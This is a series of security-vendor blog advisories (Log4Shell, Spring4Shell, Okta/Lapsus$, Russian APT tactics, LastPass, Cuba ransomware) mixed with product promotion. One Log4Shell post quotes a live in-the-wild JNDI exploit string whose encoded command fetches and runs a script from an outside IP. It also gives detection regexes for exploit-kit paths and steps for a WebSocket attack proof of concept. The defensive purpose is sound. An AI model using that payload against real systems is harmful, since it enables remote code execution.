- Rclone Execution via Command Line or PowerShell (Windows)
- Common attack pattern by groups once foothold is gained to exfiltrate data
For further technical details, see:
Sign Up For Your Blumira Trial
Blumira’s cloud SIEM detects and alerts you about suspicious behavior in your environment so that you can stop an incident early enough to prevent damage. Each finding we send is accompanied with a security playbook, giving you clear recommendations on how to remediate an attack. Our support team of security analysts is always available to answer questions on how to interpret a finding, or for other security help.
Blumira’s trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.
Medium
What Happened?
On March 30, 2022 rumors began to circulate that a remote code execution (RCE) vulnerability was discovered in Spring Core, the most widely-used lightweight open source Java framework. These rumors began because a Chinese researcher published what appeared to be proof-of-concept (POC) exploit code on GitHub, and then quickly deleted it.
However, what we now know is that there is no actual broad threat to environments, and that the virality of the internet is perhaps too much for anyone at this point. This is a perfect example of potential blue team exhaustion and what can come from chasing unconfirmed potential threats. Information develops quickly and acting quickly is important at times, but having the full picture of risk is the most important first step.
The continuous stream of zero days and ongoing issues has pushed the information security community and its related media into a continuous feeding frenzy which a now-deleted researcher on Twitter took advantage of. There is currently no new risk to Spring Core and the only known vulnerability associated with the CVE is for Spring Cloud Functions.
Around the same time as the RCE rumor, Spring Core changed how they handled deserialization, but it was not to prevent an RCE. Rather, it was to clarify that using certain deserialization methods from untrusted sources is not secure.
CVE-2022-22963 is for Spring Cloud Functions, the serverless function components. An adversary could potentially leverage this vulnerability to remotely execute code on an application that was developed using Spring and runs a vulnerable version of Java Development Kit (JDK), according to the write-up on Spring Cloud’s website.
The vulnerability affects version JDK9 of the Spring framework and above.
Update (3/31/22 at 11:30 AM ET): Shortly after this write-up went live, information about an RCE vulnerability in Spring Framework was published. According to VMware:
“The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.”
If you have the following setup, you may be vulnerable:
- JDK 9 or higher
- Apache Tomcat as the Servlet container
- Packaged as WAR
- spring-webmvc or spring-webflux dependency
This does not mean that Spring Framework will not be impacted in the future as information is developed, or that your custom usage of Spring Framework is not vulnerable. However at this point, all prerequisites required to be vulnerable to this RCE require a customization of Spring that utilizes the vulnerable data binding.
How Bad is This?
Remote code execution is always a fairly big deal because it allows an adversary to execute malicious code on vulnerable servers; however, this shouldn’t induce panic in the way that Log4j did.
POCs have been published that enable attackers to exploit this vulnerability, but it is unclear whether an attacker could realistically execute them. While some were able to replicate the POC the amount of prerequisites required to allow the POC to function indicate that this may have been a contrived example which identified unsafe deserialization uses. This is not the same as a properly vulnerable environment that could be exploited easily, e.g., Log4j, ProxyShell, etc.
How Does This Compare To Log4j?
At this point there is no relation in severity to Log4j, the name that was created for it “Spring4Shell” was done to trigger automatic relation, but the same type of threat does not exist. This is not to say that a vulnerability in Spring does not exist, but rather that this issue does not appear to be the threat it was purported to be.
What Should I Do?
Probably nothing!
If you use Spring Cloud Functions and are exposing them to the internet, you should consider updating the version used and reviewing how they are utilized. Versions 3.1.6, 3.2.2 and unsupported older versions are all impacted by CVE-2022-22963 and should be updated to 3.1.7 or 3.2.3.
While there may be a way to set up Spring in a way that an RCE is possible through unsafe deserialization of commands, it requires a large number of prerequisites to be a risk to the environment.
Try Blumira Today
Blumira’s cloud SIEM detects and alerts you about suspicious behavior in your environment so that you can stop an incident early enough to prevent damage. Each finding we send is accompanied with a security playbook, giving you clear recommendations on how to remediate an attack. Our support team of security analysts is always available to answer questions on how to interpret a finding, or for other security help.
You can try Blumira; setup takes a matter of minutes.
Medium
What Happened?
Okta, an authentication services provider, is investigating a potential customer data breach after the hacker group Lapsus$ posted screenshots on Tuesday, March 22 of what appeared to be Okta’s internal environment on Telegram.
According to the Lapsus$ post, the group acquired superuser or admin access to Okta’s environment. The group included a screenshot of a hacker resetting the password for a Cloudflare Security Reliability Engineer to show their level of access.
Todd McKinnon, CEO of Okta, responded to the potential breach via Twitter, claiming that the incident was related to a contained breach in late January 2022.
In late January 2022, Okta detected an attempt to compromise the account of a third party customer support engineer working for one of our subprocessors. The matter was investigated and contained by the subprocessor. (1 of 2)
— Todd McKinnon (@toddmckinnon) March 22, 2022
“Based on our investigation to date, there is no evidence of ongoing malicious activity beyond the activity detected in January,” McKinnon tweeted.
Update 3/22/22 @ 3:30 PM ET: According to Okta, an attacker had access to a support engineer’s laptop between January 16-21, 2022. However, the company assured that it has not been breached and remains fully operational, and that Okta customers do not need to take any further actions.
What Is Lapsus$?
Lapsus$ is a hacking group known for extorting companies and leaking data. Over the last few months, they have released data from NVIDIA and Microsoft after attempting extortion. Lapsus$ has confirmed attacks against Samsung, Vodafone, Ubisoft and more high profile targets as well.
In many cases, Lapsus$ has been recruiting employees and insiders at companies to gain access into environments and steal data. This adds another layer of complexity for organizations in determining their attack surface exposures.
How Bad is This?
Okta has hundreds of thousands of users on their platform, including major enterprise customers such as JetBlue, T Mobile, FedEx, and Major League Baseball (MLB).
A confirmed breach could potentially compromise those customer accounts.
What Should I Do?
If you are running Okta, review your Okta system and audit logs for anomalous administrative actions and access within your environment. Shut off Okta support access if you previously enabled it to prevent third-party contractors from accessing your account, as seen in the Lapsus$ hack.
It’s also worth taking this opportunity to review third-party solutions that you are running in the cloud. A large company is not necessarily secure; it depends how that vendor allows your data to be accessed. Reach out to your customer success managers to determine if there is unnecessary access by third parties into your environments as was seen within the Okta hack.
The Importance of Logging
When a threat actor uses stolen credentials to breach your environment, having visibility into your environment is crucial. A security information and event management (SIEM) platform can correlate data, including data from authentication providers such as Okta, and alert on suspicious activity.
If a threat actor like Lapsus$ uses credentials to pivot into an environment, it’s important to look at endpoint logs to detect suspicious behavior — for example, downloading large amounts of data, logging in from infrequently used countries, or mass changing file permissions. A threat detection and response platform eliminates the need to look at raw logs and alerts you about suspicious behavior.
Retaining logs is especially important for incident response, allowing teams to go back and connect the dots to determine how an attacker infiltrated the environment and what systems are compromised.
Try Blumira Today
Blumira’s cloud SIEM detects and alerts you about suspicious behavior in your environment so that you can stop an incident early enough to prevent damage. Each finding we send is accompanied with a security playbook, giving you clear recommendations on how to remediate an attack. Our support team of security analysts is always available to answer questions on how to interpret a finding, or for other security help.
Blumira’s trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.
Medium
Russian-sponsored threat actors have already distributed cyberattacks via new malware and wiperware such as Cyclops Blink and HermeticWiper. As tensions between Ukraine and Russia escalate, there’s potential for increased cybersecurity risk against targets across the world.
We’ve witnessed this historically during previous unrest. For example, the Ukrainian Maidan revolution in 2014 resulted in the NotPetya wiperware campaign. These attacks extended well beyond the borders of the country and impacted a number of organizations that had Ukrainian assets.
However, organizations of all sizes and industries — even those that aren’t affiliated with Ukrainian assets — should be prepared to respond to state-sponsored cyberattacks. Threat actors are opportunistic, and will likely target environments without proper security controls — including small and mid-sized businesses that often lack resources — because they are easy wins.
Russian advanced persistent threats (APTs) follow similar playbooks to other highly-effective groups; these techniques, tactics, and procedures (TTPs) are not secret.
It’s important to be aware of these tactics and detect them early enough to stop an attack in progress. Here are some TTPs, mapped to the MITRE ATT&CK Framework, that Russian state-sponsored threat actors have been known to use.
Initial Access
According to MITRE, initial access techniques use various entry vectors to gain an initial foothold within a network. Initial access is an especially important tactic to detect because it occurs so early on in the cyber kill chain.
Russian threat actors have used the following techniques to gain initial access before launching a cyberattack:
External Remote Services
External remote services such as VPNs and Remote Desktop Protocol (RDP) are common ways for attackers to gain a foothold in an environment. Most notably, state-sponsored actors have weaponized CVE-2019-11510, CVE-2019-11539, and CVE-2018-13379, vulnerabilities that affect Pulse Secure, Palo Alto GlobalProtect and Fortinet Fortigate.
Upgrading to the latest version of VPN software is crucial. Since a malicious actor could have already exploited the VPN to steal credentials, it’s important to also reset the VPN’s credentials after patching.
RDP attack data from Blumira’s honeypots
RDP is another commonly-exploited external service. Avoid relying on RDP if at all possible. If you must use RDP, follow these security best practices:
- Never allow RDP to be internet-facing
- Configure Network Level Authentication (NLA) and similar protections for RDP.
- Ensure that any and all remote access flows through a proper virtual private network (VPN) connection protected by two-factor authentication (2FA) whenever possible.
- Limit the amount of users that need RDP access and limit access to specific IPs
Credential Access
Brute Force
In a brute-force attack, threat actors rely on automated software to generate a large number of consecutive guesses as to the value of the desired data, such as a password.
From 2019 to 2021, GRU — Russia’s military intelligence group — launched a brute-force campaign that targeted hundreds of government and private sector organizations worldwide, specifically organizations running Microsoft 365 cloud services. Threat actors used a Kubernetes cluster to perform password spraying techniques on a larger scale.
To defend against brute force attacks, organizations should deploy multi-factor authentication (MFA), limit the number of times a user can unsuccessfully attempt to log in, and temporarily lock out users who exceed the specified maximum number of failed login attempts.
Password Spraying
Password spraying, a variant of a brute-force attack method, is a common tactic used by Russian state-sponsored threat actors. Password spraying takes a large number of usernames and loops them with a single password, applying that to multiple accounts over a period of time to gain access into an environment.
In October 2021 Nobelium, the Russian state-sponsored actors that were also responsible for the 2020 SolarWinds attack, gained access to privileged accounts in MSPs and resellers using a variety of techniques — password spraying being one of them — and then leveraged that access to attack the service providers’ customers.
The most effective way to prevent password spraying is by using two-factor or multi-factor authentication. Organizations can also monitor for persistence use — attempting to log in to multiple accounts via the same IP address — via their identity platforms. For Windows hosts, it’s important to also enable more robust logging capabilities to get visibility into password spraying attacks. Sysmon is a good way to extend Windows default logging capabilities.
A dynamic blocklist can stop an attack in its early stages by automatically blocking IP addresses that are attempting to perform password spraying.
Steal or Forge Kerberos Tickets: Kerberoasting
Russian state-sponsored APT actors have performed “Kerberoasting,” an offline cracking technique in which actors abuse valid Kerberos ticket-granting services to obtain valid Service Principal Names (SPN) within an Active Directory (AD) domain. Any instance of Kerberoasting in an environment should be considered a critical threat.
There are a few ways to detect Kerberoasting attacks; one way is to create a honey credential (or honeytoken) that exists solely to act as a canary.
Learn More About Detecting Kerberoasting Attacks >
Persistence
During the persistence phase, adversaries attempt to maintain their foothold on systems.
Web Shell
Hours before Russia invaded Ukraine on February 24, a new form of disk-wiping malware was used to attack organizations in Ukraine. Part of that campaign included installing web shells weeks prior to the attack. Web shells were also used by the Russian GRU cyber military group.
To identify the creation of web shells in your environment, review web accessible directories for newly created .php, .asp, .aspx, and .jsp files.
Read More About How To Detect Web Shells>
Account Manipulation: Exchange Email Delegate Permissions
In the Russian GRU’s brute-force campaign, threat actors used a PowerShell cmdlet (NewManagementRoleAssignment) to grant the ‘ApplicationImpersonation’ role to a compromised account. Although PowerShell is a legitimate tool that IT administrators commonly use, it can also be used to maintain a foothold or execute malicious code without administrative access.
Organizations can alert on PowerShell commands and scripts through third-party software or via a security information and event management (SIEM). It is also fairly straightforward to enable it in Microsoft Group Policy.
Learn More About Detecting Malicious PowerShell Activity>
Privilege Escalation
Privilege escalation refers to an adversary attempting to gain higher permissions, according to MITRE.
Valid Accounts: Cloud Accounts
State-sponsored actors have also used valid credentials of a global admin account to log into the Microsoft 365 admin portal and change permissions of an existing enterprise application.
To prevent this, you can correlate logs, including Microsoft 365 logs, from network and host security devices and assign administrator roles to role-based access control (RBAC) to implement least privilege principles. Due to its high level of default privilege, only use the global admin account when absolutely necessary; instead, use other built-in admin roles within AD.
Discovery
File and Network Discovery
Russian threat actors have also used BloodHound, a tool that can collect information about AD users, groups, and computers, and map pathways to escalate privileges to domain administrator accounts and expedite lateral movement. Robust endpoint detection and response (EDR) software should be able to detect the use and presence of tools like BloodHound on your network.
Equally important is the ability to send EDR logs to a centralized logging system to correlate with other telemetry sources. This will help identify and contextualize security threats, enabling you to respond quickly and more effectively.
What You Should Do To Protect Against Russian Cyberattacks
Knowing how to prevent and detect the known TTPs listed above is a step in the right direction to defend against state-sponsored attacks. Now is also a good time to ensure that you’re enacting basic security principles that will reduce your overall attack surface.
If you aren’t fully prepared, make changes as soon as possible to ensure that you are secure and patched. This includes doing the following:
- Reviewing your exposed borders/DMZs to ensure that you are limiting your attack surface. You can use tools such as search.censys.io and shodan.io for this.
- Deploying Sysmon within your environment if you haven’t yet done so.
- Enabling MFA via Microsoft 365, Google Workspace (formerly GSuite), Okta, and any other identity provider you are using.
- If you’re on Microsoft 365, disable legacy authentication wherever you can within your organization.
- Consider enabling Block macros from running in Microsoft Office files from the Internet through GPO (Group Policy Objects) if you have not yet done so.
- Notifying all employees to be more aware and cautious and to report any concerning emails or files ASAP.
- Discussing with your team what you will do in the event that your organization is breached. Planning now will save you time later during an incident.
Check Your Security Gaps
Taking time to go through the above steps is one of the best ways you can ensure that you are as protected as possible right now. It’s also important to measure your current security maturity and identify any missing capabilities. Our checklist of the different areas of threat detection and response – from logging to alerting to audits and compliance – can help you identify any security gaps.
Low
On Tuesday, December 28, tech media outlets began reporting ‘LastPass master passwords may have been compromised’ or ‘Hackers are going after LastPass master passwords’. No surprise here – according to thelatest Verizon Data Breach Investigations Report (DBIR), today’s hackers have a preference for stealing credentials over more complex attacks, so password manager accounts are obvious targets for credential stuffing attacks.
If you lack basic password hygiene (like using strong passwords, changing them on occasion, and never re-using them), your password has probably already been cracked, leaked, or stolen. And, if you use a password manager and don’t follow vendor recommendations and best-practices (like using multi-factor authentication), your password manager will probably get hacked.
While there seems to have been a recent uptick in credential stuffing attacks targeting LastPass accounts, there doesn’t seem to be any evidence of anything having been breached or compromised – other than LastPass master passwords used in the attacks, which were already compromised.
Some misinformation seems to be spreading, and we’ve had clients ask us if LastPass was breached or if LastPass was exploited. Inflammatory headlines, new articles citing concerns over LastPass’ use of embedded trackers from earlier this year (which is a genuine privacy concern, but unrelated to potential LastPass compromise) and Tweets like this one don’t really help:
So, we wrote this blog to summarize what happened, what you should do if you’re a LastPass user, and what any organization can do to detect and respond to credential stuffing attacks.
What happened?
Was LastPass hacked? Not exactly. Some LastPass accounts became targets of credential stuffing attacks. According to most of the media coverage, this was first reported onycombinator’s Hacker News (HN) forum. In this case, attackers seemed to have obtained the account’s master password (probably from a leaked password database that has nothing to do with LastPass). But, at least some of these attempts were blocked by LastPass’ security tools, and the account was otherwise protected by two-factor authentication (2FA).
Many other LastPass users replied to the post on HN and stated that they were experiencing similar activity, and that soon began to echo on Reddit, Twitter, and elsewhere.
This chatter indicates an uptick in credential stuffing attacks targeting LastPass accounts, but there doesn’t seem to be any evidence of account breaches or compromise.
Here’s the latest statement that LastPass provided to AppleInsider’s request for information:
“LastPass investigated recent reports of blocked login attempts and we believe the activity is related to attempted ‘credential stuffing’ activity, in which a malicious or bad actor attempts to access user accounts (in this case, LastPass) using email addresses and passwords obtained from third-party breaches related to other unaffiliated services,” LastPass spokesperson Meghan Larson told us. “It’s important to note that, at this time, we do not have any indication that accounts were successfully accessed or that the LastPass service was otherwise compromised by an unauthorized party. We regularly monitor for this type of activity and will continue to take steps designed to ensure that LastPass, its users, and their data remain protected and secure.”
What should LastPass users do?
First, know this: credential stuffing attacks happen all day every day to LastPass accounts and everything else on the internet, and these attacks rely on credentials that have already been compromised. For that reason, you should be practicing good password hygiene to mitigate the risk of credentials being cracked, leaked, or stolen, and you should use the strongest available multi-factor authentication options wherever possible to protect ALL of your accounts from credential stuffing using compromised credentials. A secure single-sign on solution is one way to implement multi-factor authentication across your applications while improving user experience.
That being said, LastPass offers security features that users can implement to protect their accounts. For starters, all LastPass tiers (including free personal accounts) support multi-factor authentication (MFA). If you’re not already using MFA, you should go set this up right now.
For LastPass Premium, Business, and Enterprise users, review your security dashboard and follow guidance to improve your security score. The security dashboard allows you to make sure that all of your users are practicing good password hygiene, avoiding password reuse (a leading cause of credential theft), and avoiding passwords that are already compromised.
What else can I do to detect and respond to credential stuffing attacks?
Any security practitioner will tell you that good cyber hygiene is the most effective way to protect against most attacks, and it should be the first line of defense. After that, event logs generated by your systems and applications can provide insights that can be used to improve cyber hygiene, or early-warning signs that can be used to respond to an attack before it results in a breach.
In order to get insights or early-warning signs from data contained in massive volumes of event logs, the data need to be analyzed and filtered to avoid false-positives and provide actionable alerts. Security Information and Event Management (SIEM) tools exist to solve this problem, and a well-tuned SIEM can be a nightmare for a hacker (or a penetration tester).
SIEM solutions come in all shapes and sizes. Some solutions are infinitely scalable and extensible but require significant tuning effort (and even development) to use effectively, while others may have a more limited set of features but can be seamlessly integrated with common systems and deployed without much pain.
Depending on the size of your organization, you may be well-served by engaging a managed security service provider (MSSP) to deploy and manage a SIEM for you, or you may be a good fit for deploying and managing a SIEM in-house.
How does Blumira prevent credential stuffing attacks?
Since we’re on the topic of LastPass, we wanted to provide a specific example of a quickly deployable SIEM solution that integrates with LastPass for detecting these types of attacks. We find that Blumira strikes a nice balance between features and configurability while providing out-of-the-box integrations and detections (including LastPass) that require almost no tuning.
Blumira took us less than a few hours to set up with integrations for LastPass (which only took a few minutes), Duo, Windows and Linux endpoint logs, Microsoft 365, Azure, Cisco, Meraki, and GSuite. During our testing, we were able to trigger findings in Blumira of a LastPass policy violation like this one:
Among other things, Blumira also watches out for anomalous user behavior in the LastPass environment, and/or activity coming from an IP address with a poor reputation, both of which could help detect attacks like the credential stuffing we’re hearing about in the news right now.
Ultimately, proper security comes in multiple layers, but none more important than the basics:
- Good Password hygiene
- MFA all of the things – with security keys or on-device prompts where possible
- Secure SSO + MFA = even better
You don’t have to do it alone. Partner with IT security professionals who can guide your security journey and add additional layers of security without impacting end-user productivity.
For more information about partnering with Blumira — and to learn how you can start using Blumira for free via NFR licensing — visit blumira.com/partners/.
This was originally published on JTI Cybersecurity’s blog.
Medium
Update 12/20 @ 9 AM ET: Updated to reflect our recommendation to update to Log4j 2.17.0 due to vulnerabilities in prior versions.
Blumira’s security team discovered the potential for an alternative attack vector in the Log4j vulnerability, which relies on a Javascript WebSocket connection to trigger the RCE on internal and locally exposed unpatched Log4j applications.
Previously, we understood that the impact of Log4j was limited to vulnerable servers. This newly-discovered attack vector means that anyone with a vulnerable Log4j version on their machine or local private network can browse a website and potentially trigger the vulnerability. At this point, there is no proof of active exploitation.
This vector significantly expands the attack surface and can impact services even running as localhost which were not exposed to any network.
The client itself generally has no direct control over these WebSocket connections, which can silently initiate when a webpage loads. WebSocket connections within the host can be difficult to gain deep visibility into, which increases the complexity of detection for this attack.
WebSockets Explained
WebSockets have been a part of most common browsers over the last 10 years and are used for a number of tasks as users browse. Commonly used for applications like chat and alerts on websites, WebSockets are great at passing timely information back to the browser and allowing the browser to quickly send data back and forth.
However WebSockets are accompanied by security risks that are largely unseen. WebSockets are not restricted by same-origin policies like a normal cross-domain HTTP request and they expect the server itself to validate the Origin of the request. While they are useful, they also introduce a fair amount of risk as they do not include many security controls to limit their utilization.
Previously we saw vulnerabilities associated with cable modems that leveraged WebSockets to send a malicious request to the modem. Similarly, this attack makes malicious requests to potentially vulnerable localhost or local network servers that were not exposed to the internet itself via WebSocket. These days WebSockets are also used for host-fingerprinting and port scanning by measuring the response rates to determine what ports are open; they inherently introduce a variety of risks to the environment.
Proof-of-Concept Explained
Step 1: From a machine with the affected Log4j2 vulnerability installed, trigger a file path url from the browser with a WebSocket connection. In our testing this was a basic Javascript WebSocket connection, with very little handling of the actual socket connection beyond the path request that initiated on page load. This does not necessarily need to be localhost; WebSockets allow for connection to any IP and easily could iterate private IP space.
In our testing we utilized one of the many JNDI Exploit kits that leverage existing bypasses for simplified RCE exploitation, but it does depend on the host itself. Our local application contained SpringFramework with Log4j 2.13 and would log out all requests to the server.
We saw the most success utilizing the Target environment (Build in JDK – (BYPASS WITH EL by @welk1n) whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath). However, it’s a simple effort to spin up a large subset of known-good JNDI bypass exploit methods and have the WebSockets try each of these exploit methods per IP and Port.
Step 2: As the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. We saw the most success utilizing RMI (default port 1099), although we are often seeing custom ports used. However, iterating through all available listeners was the easiest path to successful RCE as noted previously. Specific patterns should not be expected as it is easy to trigger traffic passively in the background.
This technique is similar to WebSocket localhost port scanning used for fingerprinting hosts.
Step 3: Once the victim’s host hits an open port to a local service or a service accessible to the host itself, it can then drop the JNDI exploit string in path or parameters as seen in the example above. When this happens, the vulnerable host calls out to the exploit server, loads the attacker’s class, and executes it with java.exe as the parent process. In the example below, you can see java.exe spawning cmd.exe and executing calc.exe within the user context of the vulnerable Java application.
Infrastructure Utilized
Tools
- JNDI Exploit Kit (PoC confirmed with https://github.com/pimps/JNDI-Exploit-Kit)
- HTML and javascript
- Java (JRE8) application with SpringFramework
- Log4j2 2.13
Attacker Watering Hole: Apache2 server hosting html file. This could be any server realistically, it just needs to initiate WebSocket connection
Victim: 2019 Server with Google Chrome (Version 96.0.4664.110) and localhost:8080 log4j vulnerable application (no egress filtering)
Attacker 2nd Stage: Ubuntu server running JNDI Exploit Kit
Suggested Remediation
To mitigate the risk, we strongly advise organizations to update all local development efforts, internal applications and internet-facing environments to Log4j 2.16 Log4j 2.17.0 as soon as possible, before threat actors can weaponize this exploit further. This means that you should move any custom applications being utilized across your environment in their dependency manifests to 2.17 as soon as possible to avoid incidental exploitation.
This is also a good time to evaluate egress filtering, which can restrict the callback required for the actual exploit to land. Significantly limiting the egress traffic of your endpoints will reduce risk for this attack as you patch applications in the environment. Ensure that only certain machines go out over 53, 389, 636, and 1099 (RMI); all others should be dropped. Attacks that weaponize Log4j often attempt to go out over random high ports. In most situations there is no reason a machine should go out over the internet at 12345, for example.
If you have egress filtering while the machine is on a VPN, it does not mean that this could be incidentally triggered by a developer who left a vulnerable service running while browsing the internet.
In the short term, utilizing tools like NoScript on untrusted external sites to avoid Javascript triggering WebSocket connections will also mitigate this attack, however this is not a very usable mitigation.
The identification of vulnerable internal development, applications, and vendors as well as patching to Log4j 2.16 is paramount in resolving this issue.
To summarize:
- Update all local development efforts as well as internet-facing environments to Log4j 2.17.0
2.16 - Review and update or implement egress filtering to ensure that callbacks are not successful in many cases
- Detect when .*/java.exe is the parent process for cmd.exe/powershell.exe – this is potentially very noisy.
- Ensure that your host detection for exploitation of Cobalt Strike, Trickbot, and related common attacker tools are functioning as intended and that you have the needed visibility to do so.
- Identify where Log4j is used within your environments. No scanning script is perfect, but there are a number out there that will help at least identify the libraries used locally:
- Temporary:
- Implement NoScript on untrusted sites to avoid javascript randomly being loaded and initiating WebSockets.
- Move all local development to https, certs will likely fail for local development so wss:// should also fail unless the browser also trusts them.
Learn More
Matthew Warner, CTO and Co-Founder, will explain how he discovered this attack vector and answer any questions in a recorded livestream. To watch on demand, go here.
Critical
Note: Blumira is not impacted by this vulnerability; our sensors do not utilize Java or Log4j at all, nor does our application infrastructure.
Update 12/14 @ 9 AM ET: We discovered yesterday around 4PM ET that while Blumira’s application and ingestion were not impacted, one module was: the Elastic Logstash module. We confirmed that the RCE did not impact the version we were running, but it could have been vulnerable to DoS and resource exhaustion within the module.
We patched, tested, and deployed the fixed version (1.2.0) by 5:45PM and notified all impacted customers of the vulnerability and fix. This amounted to updating ~1% of the sensors in use across the Blumira platform that had this version of Logstash. There was no evidence of exploitation within the organizations as none of these services were internet-facing.
This finding further emphasizes the ubiquitous nature of the Log4j vulnerability and the importance of due diligence. As a security company, we believe it is our duty to lead by example and be transparent about our own security practices.
Update 12/20 @ 9 AM ET: Updated to reflect our recommendation to update to Log4j 2.17.0 due to vulnerabilities in prior versions.
What Happened?
A remote code execution (RCE) zero-day vulnerability (CVE-2021-44228) was discovered in Apache Log4j, a widely-used Java logging library, and enables threat actors to take full control of servers without authentication.
The vulnerability was publicly disclosed via GitHub on December 9, 2021. Versions 2.0 and 2.14.1 of Apache Log4j have been impacted. Java Development Kit (JDK) versions 6u211, 7u201, 8u191 and 11.0.1 are not affected, according to LunaSec.
LunaSec has put out a great blog post detailing how this vulnerability has evolved over the last day, which is worth a read.
Log4j log output allows for the inclusion of variables that make Java logging more robust and verbose for local environments. This was added for “convenience,” as the originating pull request indicates from 2013, when this vulnerability was added.
However, this also enables attackers to call external Java libraries via ${jdni:ldap:// and ${jndi:ldaps:// opening up the opportunity to perform shell dropping without much additional effort. Additionally, threat actors can leverage ${jdni:rmi to execute commands within the actual environment to deploy the RCE attack and drop shells.
Minecraft was the first application known to be affected by this vulnerability, but due to the ubiquity of the Java logging library, it won’t be the last. Cloud applications such as Steam and Apple iCloud have already proven to be vulnerable.
Threat actors have already exploited this zero-day in the wild, according to CERT New Zealand.
How Bad is This?
Log4j is an incredibly common Java logging utility that is found in a large portion of Java applications. Because of the nature of this vulnerability, we expect this to persist in environments for months to years, similar to Shellshock. To successfully execute an attack, a threat actor only needs to control a string that is logged out by a Java application that uses Log4j. No authentication is required to take advantage of this vulnerability.
Right now we are seeing attackers start to leverage the User Agent, URI Paths, and field POSTs largely as attack vectors into environments but expect this to evolve over time. Due to the ease of exploitation, we expect that these attacks will be added to a part of the normal offensive toolkit and therefore should be remediated as soon as possible.
We expect threat actors to use this vulnerability as a new entry point to test whether they can access an environment. Through scanning, it is relatively easy for an attacker to drop the exploit in many different areas. Below is an example of an actual scan and exploit that we are now seeing land across environments contained in the User Agent of a request. This is derived from an already existing JNDI Exploit kit, which is now utilizing this new JNDI entry point via Log4j https://github.com/feihong-cs/JNDIExploit (now unavailable).
${jndi:ldap://45(.)155(.)205(.)233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMC4zNy4xMzcuMzM6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMjAuMzcuMTM3LjMzOjgwKXxiYXNo}
At a high level, here are some takeaways regarding the severity of this zero-day:
- For the most part, only crypto miners are scanning for this vulnerability right now but this is likely to change in the future.
- Firewalls and VPNs will likely be affected once their developers catch up with the news.
- Citrix applications are likely to be impacted, since many Citrix apps are written in Java.
- This vulnerability is going to have a long tail, because in many cases if it’s in someone’s own stack, they likely have to update Java as well, which is a big lift.
- The mitigation is probably only temporary as threat actors find new ways to utilize JDNI exploitation.
What Should I Do?
You can determine whether you were impacted by looking in your log files for services that use the affected Log4j versions (between versions 2.0 and 2.14.1). If those log files contain user-controlled strings (for example, Jndi:ldap), then they could be impacted.
We’ve also developed a vulnerability scanner to determine whether your systems are impacted, which is on GitHub.
However, all Log4j users should immediately upgrade to Log4j-2.15.0-rc2 Log4j 2.17.0.
To mitigate the vulnerability, users should apply ‐Dlog4j2.formatMsgNoLookups=True to the JVM command for starting the application.
It is important to note that you likely utilize Log4j across a large number of your toolsets and are unaware of it. Over the coming days you will see vendors quickly release patches and they must be applied as soon as possible. However some applications will either never be patched or will just be missed through the nature of scope. In those situations you will want to ensure that you are blocking potentially dangerous traffic through proper segmentation.
If you have a firewall that can perform inspection and blocking based off of the User Agent and request path, you can potentially mitigate this attack.
For example, in Palo Alto you can create a custom Vulnerability Signature > Signatures > Add > Transaction > Add And Condition. In the Condition, change Operator to Pattern Match, Context of http-req-headers, and modify Pattern to be \$\{jdni:(ldap|rmi|dns|nis|iiop|corba|nds|http) and block this custom Vulnerability signature to ensure no exploitation can occur.
These attacks are largely being inserted into the User Agent by scan and exploit kits right now but can also occur through any open fields that could be logged out, e.g., Usernames in login fields or Paths in the actual requests.
Update 12/14 @ 9 AM ET: We discovered a technique that could impact vulnerable services even if not listening to a service in which localhost has access. You should also patch all non-exposed services, as well.
How To Detect
To detect exploits of CVE-2021-44228 in the wild, look out for the following Indicators of Compromise, which we’ve published on GitHub.
The good news is that Log4Shell is relatively easy to detect with string-based detection (see below):
It is also possible to detect through outbound lightweight directory access protocol (LDAP), although we are seeing random ports being applied to attacks in the wild which may mitigate this. If you can do app-specific outbound detection, you may have better fidelity in the detection effort.
Additionally as we have seen patterns of use from the Exploit Kit https://github.com/feihong-cs/JNDIExploit, you can perform pattern detection within User Agent and attacker-manipulated fields with (Basic\/(DnsLog|Command|ReverseShell|Tomcat|Spring|Weblogic|Jetty|Websphere|Spring)|Deserialization\/|TomcatBypass|GroovyBypass|WebsphereBypass)
You can also apply an unofficial patch, Log4Patch, created by AWS security engineer Volker Simonis, that injects a Java agent into a running JVM process.
How Blumira Can Help
At Blumira we’ve developed a global search for exploit attempts. The search tool uses web server logs (Apache|Nginx|IIS) to look for exploit attempts in the User Agent String, which is used by one of the POCs. Blumira customers can access this in the customer portal.
Non-Blumira customers with SSH access to a Linux server can enter this search into their own tools using this logic: https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b#log4j-rce-exploitation-detection
Blumira’s cloud SIEM detects and alerts you about suspicious behavior in your environment so that you can stop an incident early enough to prevent damage. Each finding we send is accompanied with a security playbook, giving you clear recommendations on how to remediate an attack. Our support team of security analysts is always available to answer questions on how to interpret a finding, or for other security help.
Blumira’s free trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.
Learn More About Log4Shell
To learn more about Log4Shell, watch our recorded livestream:
Low
The Cuba ransomware group has compromised 48 U.S. critical infrastructure organizations in the financial, government, healthcare, manufacturing and information technology industries and cashed out with at least $43.9 million in payments, according to a recent FBI flash alert.
To know what to look for, it’s important to understand the methods that the Cuba variant uses to compromise victim systems and respond early enough to stop an attack in progress.
How To Detect Initial Compromise
Cuba ransomware is distributed through Hancitor malware that drops or executes Remote Access Trojans (RATs) onto victim networks. To gain initial access, they use the following methods:
- Phishing emails – Threat actors send these types of emails to trick users into clicking on malicious links or opening malicious attachments.
- Stolen credentials – Attackers leverage the Windows program Mimikatz to steal passwords, hashes, PINs and more from memory to escalate privileges. Most security incident and event management (SIEM) platforms can detect the presence of Mimikatz on a network.
- Microsoft Exchange vulnerabilities – The Cuba ransomware group uses several vulnerabilities affecting Exchange servers in targeted attacks in the wild. Microsoft has released security updates for them and recommends patching immediately to protect your environment. Learn how Blumira helped a customer evade a real-life Exchange attack.
